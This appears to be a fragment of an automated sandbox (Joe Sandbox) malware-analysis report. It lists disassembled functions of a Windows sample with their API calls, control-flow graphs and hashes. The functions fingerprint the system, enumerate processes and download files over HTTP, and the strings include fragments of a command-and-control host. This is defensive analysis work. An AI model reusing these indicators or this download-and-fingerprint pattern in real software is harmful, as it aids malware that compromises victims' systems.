                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                        • String ID: %s%s$delays.tmp
                                                                                                                                                                        • API String ID: 1620473967-1413376734
                                                                                                                                                                        • Opcode ID: 2282131e860ae1a35bfe4a97dcd2016a2e96f43e5cc2066303e818be5a1e3656
                                                                                                                                                                        • Instruction ID: ae976be826ee0df9441edb155d3617704968abcc6e83e0d4e074a12e3d6e0acf
                                                                                                                                                                        • Opcode Fuzzy Hash: 2282131e860ae1a35bfe4a97dcd2016a2e96f43e5cc2066303e818be5a1e3656
                                                                                                                                                                        • Instruction Fuzzy Hash: E74183B2900218BBDB216B61DC4DFAF7B7DEF89751F1006A9B10AE1051DB318A95CF60
                                                                                                                                                                        Function 001917DC Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1507 1917dc-191842 call 1af159 CoInitializeEx CoInitializeSecurity CoCreateInstance 1511 191848-19187a CoSetProxyBlanket 1507->1511 1512 191946-19194b 1507->1512 1517 19193f-191944 1511->1517 1518 191880-19188b 1511->1518 1513 19195a 1512->1513 1514 19195f call 1904bc 1512->1514 1513->1514 1519 191964-19196b call 1af1b5 1514->1519 1517->1514 1521 191939-19193d 1518->1521 1522 191891-1918a6 1518->1522 1521->1513 1522->1521 1525 1918ac-1918d1 VariantInit call 19172c 1522->1525 1528 1918d6-191937 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA call 1904bc VariantClear 1525->1528 1528->1519
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 001917E3
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,0000004C,00193F39,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 001917F4
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191805
                                                                                                                                                                        • CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 0019181F
                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00191855
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 001918B0
                                                                                                                                                                          • Part of subcall function 0019172C: __EH_prolog3_catch.LIBCMT ref: 00191733
                                                                                                                                                                          • Part of subcall function 0019172C: CoCreateInstance.OLE32(001B31B0,00000000,00000001,001BAF60,?,00000018,001918D6,?), ref: 00191756
                                                                                                                                                                          • Part of subcall function 0019172C: SysAllocString.OLEAUT32(?), ref: 00191763
                                                                                                                                                                          • Part of subcall function 0019172C: _wtoi64.MSVCRT ref: 00191796
                                                                                                                                                                          • Part of subcall function 0019172C: SysFreeString.OLEAUT32(?), ref: 001917AF
                                                                                                                                                                          • Part of subcall function 0019172C: SysFreeString.OLEAUT32(00000000), ref: 001917B6
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 001918DF
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001918EB
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 001918F2
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00191931
                                                                                                                                                                        • wsprintfA.USER32 ref: 0019191E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                        • API String ID: 2280294774-461178377
                                                                                                                                                                        • Opcode ID: 2410f626dbf2a0422c08dad56b63ad1257533aac18fd12fbd944bf75a0eefa31
                                                                                                                                                                        • Instruction ID: b000304e2bc15b9501b72a599a3e32511ca399046f4a84ef157ed3aac11b078b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2410f626dbf2a0422c08dad56b63ad1257533aac18fd12fbd944bf75a0eefa31
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A413A71940209BBDB119BE5DC89EFFBBBDEF89B11F10410AF611E6194D7789981CB20
                                                                                                                                                                        Function 00197083 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1531 197083-19711c call 1ae3e0 call 1904bc call 190c28 call 1905de * 3 call 190562 call 182920 * 3 1552 197125-197136 OpenEventA 1531->1552 1553 197138-19722e CreateEventA call 1904bc call 198153 call 19051e * 2 1552->1553 1554 19711e-19711f CloseHandle 1552->1554 1563 197235-19724a 1553->1563 1554->1552 1563->1563 1564 19724c 1563->1564 1565 197253-197268 1564->1565 1565->1565 1566 19726a-19726f 1565->1566 1567 197276-197294 1566->1567 1567->1567 1568 197296-197298 1567->1568 1569 19729f-1972bd 1568->1569 1569->1569 1570 1972bf 1569->1570 1571 1972c6-1972d1 call 19823f 1570->1571 1574 1972d3-1972dc 1571->1574 1575 1972dd-1972e8 call 198267 1574->1575 1578 1972ea-197313 call 182f12 call 198995 call 18113b 1575->1578 1585 1975d9-197790 call 191c1f call 190562 call 182920 call 1904bc call 1905de call 19059c call 190562 call 182920 * 2 CreateDirectoryA call 181cfd call 1969f8 call 19828f call 196dcd call 190562 * 2 call 1904ee call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 InternetOpenA * 2 call 1904ee call 1904bc call 190977 call 1904ee call 184b2e call 193a02 1578->1585 1586 197319-1975b3 call 1904bc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 192554 1578->1586 1700 19779d-1978e0 call 1904bc call 181cfd call 185f39 call 19347f call 1904bc call 181cfd call 185f39 call 193299 call 1904bc call 181cfd call 185f39 call 1933d0 call 181cfd call 193bc6 call 1904ee call 1904bc call 185237 call 181cfd call 18ea91 1585->1700 1701 197792 1585->1701 1842 1975b8-1975ba 1586->1842 1778 197950-197958 1700->1778 1779 1978e2-19794a call 1904bc call 181cfd call 185f39 call 193518 call 181cfd call 18274e 1700->1779 1701->1700 1781 19795a-1979cb call 1904bc call 181cfd call 185f39 call 1931d8 call 181cfd call 19314c 1778->1781 1782 1979d1-197a4f call 1904bc call 181cfd call 185f39 call 1935e8 call 181cfd call 1953d2 1778->1782 1779->1778 1781->1782 1833 197a6f-197a76 1782->1833 1834 197a51-197a6c call 181cfd call 1956af call 181cfd call 196ff9 1782->1834 1835 197a78-197a8e call 181cfd call 195e39 1833->1835 1836 197a91-197a98 1833->1836 1834->1833 1835->1836 1840 197a9a-197ab0 call 181cfd call 196372 1836->1840 1841 197ab3-197aba 1836->1841 1840->1841 1844 197abc-197ad5 call 181cfd call 1964ff 1841->1844 1845 197ae2-197ae8 1841->1845 1848 1975bc-1975c6 call 19ccb1 1842->1848 1849 1975d0-1975d4 call 182920 1842->1849 1844->1845 1853 197aea-197af1 1845->1853 1854 197ad7-197adc Sleep 1845->1854 1848->1849 1849->1585 1860 197b0c-197b13 1853->1860 1861 197af3-197b09 call 181cfd call 191f2a 1853->1861 1854->1845 1869 197b8c-197bce call 1904bc call 181cfd call 185f39 call 182920 call 18113b 1860->1869 1870 197b15-197b86 call 1904bc call 181cfd call 185f39 call 1931d8 call 181cfd call 19314c 1860->1870 1861->1860 1898 198032-19807f call 192516 CloseHandle call 181cfd call 1982b3 call 182920 * 2 1869->1898 1899 197bd4-197e75 call 1904bc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 192554 1869->1899 1870->1869 1922 198080-19808b call 193129 1898->1922 2062 198029-19802d call 182920 1899->2062 2063 197e7b-197f56 call 19cd66 call 1904bc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 1899->2063 1928 19808d-198096 1922->1928 1930 198097-1980a2 call 1953af 1928->1930 1936 1980a4-1980ad 1930->1936 1938 1980ae-1980b9 call 198224 1936->1938 1944 1980bb-1980c4 1938->1944 1946 1980c5-1980d0 call 1981ea 1944->1946 1953 1980d2-1980de 1946->1953 1954 1980e0-1980f3 call 182920 * 2 1953->1954 1964 1980f5 1954->1964 1966 1980fc-19810f call 182920 * 2 1964->1966 1976 198111-198152 call 196dcd call 181cde call 182920 * 2 call 19d05a 1966->1976 2062->1898 2099 197f57-197f62 call 198267 2063->2099 2102 197f64-197fc0 call 1904bc call 1904ee * 3 call 185482 2099->2102 2112 197fc5-198012 call 1931d8 call 181cfd call 19314c 2102->2112 2119 198013-19801e call 193129 2112->2119 2122 198020-198024 call 182920 2119->2122 2122->2062
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00190C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
                                                                                                                                                                          • Part of subcall function 00190C28: HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
                                                                                                                                                                          • Part of subcall function 00190C28: GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,001985D1), ref: 0019711F
                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,?,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019712E
                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,001B66D6), ref: 0019764C
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0019770D
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00197726
                                                                                                                                                                          • Part of subcall function 00184B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00184BCD
                                                                                                                                                                          • Part of subcall function 00184B2E: StrCmpCA.SHLWAPI(?), ref: 00184BEB
                                                                                                                                                                          • Part of subcall function 00193A02: StrCmpCA.SHLWAPI(?,block,?,?,00197786), ref: 00193A17
                                                                                                                                                                          • Part of subcall function 00193A02: ExitProcess.KERNEL32 ref: 00193A22
                                                                                                                                                                          • Part of subcall function 00185F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00185FD8
                                                                                                                                                                          • Part of subcall function 00185F39: StrCmpCA.SHLWAPI(?), ref: 00185FF6
                                                                                                                                                                          • Part of subcall function 001931D8: strtok_s.MSVCRT ref: 001931F7
                                                                                                                                                                          • Part of subcall function 001931D8: strtok_s.MSVCRT ref: 0019327A
                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00197ADC
                                                                                                                                                                          • Part of subcall function 00185F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0018618E
                                                                                                                                                                          • Part of subcall function 00185F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 001861D2
                                                                                                                                                                          • Part of subcall function 00185F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186200
                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,001985D1), ref: 00197142
                                                                                                                                                                          • Part of subcall function 00192554: __EH_prolog3_catch_GS.LIBCMT ref: 0019255E
                                                                                                                                                                          • Part of subcall function 00192554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00197E73,.exe,001B6CD4,001B6CD0,001B6CCC,001B6CC8,001B6CC4,001B6CC0,001B6CBC,001B6CB8,001B6CB4,001B6CB0,001B6CAC), ref: 0019257D
                                                                                                                                                                          • Part of subcall function 00192554: Process32First.KERNEL32(00000000,00000128), ref: 0019258D
                                                                                                                                                                          • Part of subcall function 00192554: Process32Next.KERNEL32(00000000,00000128), ref: 0019259F
                                                                                                                                                                          • Part of subcall function 00192554: StrCmpCA.SHLWAPI(?), ref: 001925B1
                                                                                                                                                                          • Part of subcall function 00192554: CloseHandle.KERNEL32(00000000), ref: 001925C5
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00198042
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$cowod.$df523263f44cc8d55414a260a0197e4a$hopto$http://$org
                                                                                                                                                                        • API String ID: 305159127-264486462
                                                                                                                                                                        • Opcode ID: 49d2d279ba99b8024e738dcf232e569f0ad07baf46e4dc8a02818c05ebfae0ad
                                                                                                                                                                        • Instruction ID: e6e6ed8a9762334e94f1dcb6a7679356df331dcb45a83286833abdbbef4f39c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 49d2d279ba99b8024e738dcf232e569f0ad07baf46e4dc8a02818c05ebfae0ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 59921F329083559FDA22FF24D842A8EB7E4FFA4704F414929F59467152DB74AE0ACF83
                                                                                                                                                                        Function 00185237 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2254 185237-1852c9 call 1904ee call 184ab6 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 2259 1852cb 2254->2259 2260 1852cd-1852d3 2254->2260 2259->2260 2261 1852d9-1852ff InternetConnectA 2260->2261 2262 18544b-18546d InternetCloseHandle call 182920 * 2 2260->2262 2263 18543f-185445 InternetCloseHandle 2261->2263 2264 185305-185340 HttpOpenRequestA 2261->2264 2276 185473-185481 call 19d05a 2262->2276 2263->2262 2266 185433-185439 InternetCloseHandle 2264->2266 2267 185346-185348 2264->2267 2266->2263 2269 18534a-185360 InternetSetOptionA 2267->2269 2270 185366-18539c HttpSendRequestA HttpQueryInfoA 2267->2270 2269->2270 2272 1853bb-1853bd 2270->2272 2273 18539e-1853b6 call 182920 * 2 2270->2273 2272->2266 2277 1853bf 2272->2277 2273->2276 2278 18542b-185431 2277->2278 2278->2266 2281 1853c1-1853e8 InternetReadFile 2278->2281 2281->2266 2284 1853ea-185429 2281->2284 2284->2278 2284->2284
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018527E
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00185285
                                                                                                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 001852A7
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 001852C1
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001852F1
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00185330
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185360
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018536B
                                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00185394
                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 001853DA
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00185439
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00185445
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00185451
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                        • String ID: GET
                                                                                                                                                                        • API String ID: 442264750-1805413626
                                                                                                                                                                        • Opcode ID: bdf3124790010b3a7da51ad926c36c274d51d92884e09f49cb84eee557da59a0
                                                                                                                                                                        • Instruction ID: 0e398d2399c855a3e0ed846450ad4961be026562a852361186ef5ef0058baaae
